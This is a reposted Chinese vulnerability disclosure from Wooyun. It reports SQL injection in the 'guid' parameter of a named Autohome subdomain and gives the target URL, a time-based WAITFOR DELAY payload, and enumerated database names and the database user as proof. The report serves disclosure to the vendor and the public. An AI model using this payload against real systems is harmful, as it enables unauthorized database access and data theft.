神刀安全网

漏洞标题: 汽车之家某站存在SQL注入

漏洞详情

披露状态:

2016-01-28: 细节已通知厂商并且等待厂商处理中
2016-01-28: 厂商已经确认,细节仅向厂商公开
2016-02-07: 细节向核心白帽子及相关领域专家公开
2016-02-17: 细节向普通白帽子公开
2016-02-27: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

汽车之家某站存在SQL注入

详细说明:

本来想来个验证脚本的,时间关系还是直接给结果吧

code 区域
weixin.autohome.com.cn/WeiXinGame/ShowResult?username=test&guid=60dcaec0-86ac-466f-bfc2-3538738047eb

code 区域
注入参数#guid

code 区域
Payload: username=test&guid=60dcaec0-86ac-466f-bfc2-3538738047eb';WAITFOR DELAY '0:0:5'--

漏洞证明:

code 区域
available databases [15]:
[*] [AutoMaintain/x05]
[*] [MONITOR/x05]
[*] Aladdin
[*] AutoTerminology
[*] AutoWeiXin
[*] CarDiscount
[*] DBMONITOR
[*] master
[*] model
[*] msdb
[*] Reproduction
[*] tempdb
[*] VS_MONITOR
[*] WeiBo
[*] WeiXIn

code 区域
当前数据库:    'AutoWeiXin'

code 区域
数据库用户:    'AutoWeixinWriter'

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 汽车之家某站存在SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮